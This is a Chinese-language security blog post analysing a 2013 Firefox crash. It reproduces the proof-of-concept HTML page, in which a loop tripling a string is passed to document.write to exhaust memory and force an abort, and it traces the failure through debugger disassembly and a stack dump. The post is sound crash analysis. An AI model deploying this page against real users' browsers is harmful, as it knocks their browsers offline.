Firefox Crash 0Day分析

2013-12-26 147514人围观 ,发现 6 个不明物体 漏洞

今日,在binvul(这里)看到一个Firefox Crash 0Day,于是分析了一下崩溃点和崩溃原因,样本文件是一个html文件,内容如下(注意:注释是我自己添加上去的):

【样本文件】

<html>
<head>
<title>Mozilla Firefox Crash 0Day</title>
<body onload="javascript:coolkaveh();">
<script language="JavaScript">
function coolkaveh(){
    var buf = &#039;\x41\x41\x41&#039;
    for(i=0; i <= 800 ; ++i){
buf+=buf+buf            //Written by vscen:这里存在问题,字符串太长会导致内存分配失败,之后调用mozalloc.mozalloc_abort触发崩溃
        document.write(buf);   //Written by vscen:罪魁祸首
}
}
</script>
</head>
</body>
</html>

【相关环境】

分析工具:OllyICE
浏览器:Firefox 26.0.0.5087
操作系统:Windows

【分析过程】

分配document.write(buf)所需的字符串内存,如果分配内存失败则调用mozalloc.mozalloc_abort函数触发崩溃:

10004C15 >  56              push    esi                              ; mozglue.malloc
10004C16    8B7424 08       mov     esi, dword ptr [esp+8]
10004C1A    85F6            test    esi, esi
10004C1C    75 01           jnz     short 10004C1F
10004C1E    46              inc     esi
10004C1F    81FE 00F00F00   cmp     esi, 0FF000
10004C25    77 13           ja      short 10004C3A
10004C27    6A 00           push    0
10004C29    E8 60FDFFFF     call    1000498E    
10004C2E    8BC8            mov     ecx, eax

拷贝(buf)里面的字符串到分配的缓冲区:

0156265C    8BD7            mov     edx, edi
0156265E    2BD0            sub     edx, eax
01562660    52              push    edx
01562661    50              push    eax
01562662    8B06            mov     eax, dword ptr [esi]
01562664    53              push    ebx
01562665    E8 26130000     call    01563990

堆栈信息:

0012DDA8   00F61096  /CALL 到 malloc 来自 mozalloc.00F61094
0012DDAC   0048FB78  \size = 48FB78 (4782968.)
0012DDB0   001853D3
0012DDB4   110503E0
0012DDB8   01563B0A  返回到 xul.01563B0A 来自 mozalloc.moz_xmalloc
0012DDBC   0048FB78
0012DDC0   001853D3
0012DDC4   10F3A450
0012DDC8   00000041
0012DDCC   11C00000  UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
0012DDD0   00000000
0012DDD4   00000000
0012DDD8   0156266A  返回到 xul.0156266A 来自 xul.01563990
0012DDDC   11C00000  UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
0012DDE0   00000000
0012DDE4   00247DBC
0012DDE8   0012DE94
0012DDEC   10F3A450
0012DDF0   00000000
0012DDF4   11C00000  UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

【崩溃截图】

【最后结论】

字符串太长,导致分配内存失败,调用mozalloc.mozalloc_abort触发崩溃.

发表评论

已有 5 条评论

取消
Loading...
css.php